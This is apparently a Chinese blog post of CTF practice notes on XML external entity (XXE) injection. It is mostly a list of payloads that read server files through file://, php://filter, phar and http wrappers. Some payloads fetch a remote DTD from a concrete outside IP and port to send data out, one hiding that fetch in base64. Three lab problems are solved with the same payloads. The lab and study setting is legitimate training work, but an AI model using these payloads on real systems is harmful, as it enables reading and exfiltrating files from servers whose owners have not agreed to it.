8月5日xxe漏洞训练

题记:
复制粘贴的一天
今天的重点是xxe漏洞,本地环境需要搭建服务器,可搭建云服务器,做题的重点反而是伪协议
各种常用语句的使用

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag.php">
]>
<note>
	<info>&xxe;</info>
</note>
//file协议获取flag.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.php">
]>
<note>
	<info>&xxe;</info>
</note>
//php://filter获取flag.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "phar:///var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
]>
<note>
	<info>&xxe;</info>
</note>
//phar伪协议获取flag,通常和文件上传、反序列化一起使用

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:./flag.php">
]>
<note>
	<info>&xxe;</info>
</note>
//php://filter获取flag.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY name SYSTEM "http://127.0.0.1/flag.php">
]>
<note>
	<name>&name;</name>
</note>
//http直接访问

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.php">
<!ENTITY % get SYSTEM "http://118.25.14.40:8200/hack.dtd">
%get;
%text;
%send;
]>
<note>
	<info>&data;</info>
</note>
//远程DTD加php://filter协议

<?xml version="1.0" ?>
<!DOCTYPE test [
	<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBiIFNZU1RFTSAnaHR0cDovLzExOC4yNS4xNC40MDo4MjAwL2V4cC5kdGQnPg==">
	%a;
	%b;
]>
	<test>
		&hhh;
	</test>
<!---
	base64编码解密后"<!ENTITY % b SYSTEM 'http://118.25.14.40:8200/exp.dtd'>",意思是通过调用118.25.14.40:8200端口上exp.dtd文件
	exp.dtd文件内容为<!ENTITY % hhh SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
	总的而言这句xml编码的意思就是首先定义一个变量a,a的内容是执行base64编码内容,解码后,遇到变量b,b为远程执行exp.dtd文件,dtd内容为变量hhh,意思是读取flag文件内容。
	运行顺序是a和b,hhh为dtd中的变量
	-->
//远程DTD加data协议

第一题

在这里插入图片描述
思路:
直接读取
payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<note>
	<info>&xxe;</info>
</note>

答案:
在这里插入图片描述

第二题

题目:
在这里插入图片描述
思路:
输入测试语句

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag.php">
]>
<note>
	<info>&xxe;</info>
</note>

被过滤,测试大小写、实体编码等绕过仍报错,使用data、php://filter、file等协议绕过
payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./flag.php">
]>
<note>
	<info>&xxe;</info>
</note>

第三题

题目:
在这里插入图片描述
思路:
输入简单语句进行测试

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<note>
	<info>&xxe;</info>
</note>

然后使用绕过进行测试
最后使用data伪协议和远程DTD结合的方式解答

<?xml version="1.0" ?>
<!DOCTYPE test [
	<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBiIFNZU1RFTSAnaHR0cDovLzExOC4yNS4xNC40MDo4MjAwL2V4cC5kdGQnPg==">
	%a;
	%b;
]>
	<test>
		&hhh;
	</test>

在这里插入图片描述
base64解密

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值